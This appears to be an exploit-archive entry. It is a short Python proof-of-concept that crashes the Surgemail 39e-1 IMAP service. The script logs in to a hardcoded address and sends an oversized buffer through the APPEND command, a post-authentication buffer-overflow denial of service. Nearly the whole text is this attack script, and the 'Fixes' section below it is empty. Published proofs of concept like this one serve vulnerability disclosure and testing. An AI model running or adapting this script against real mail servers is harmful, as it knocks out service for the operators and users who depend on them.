Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-06-30 00:00:00#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
#
# The IMAP service contains a buffer overflow in the APPEND command.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 3000
s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN [email protected] user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

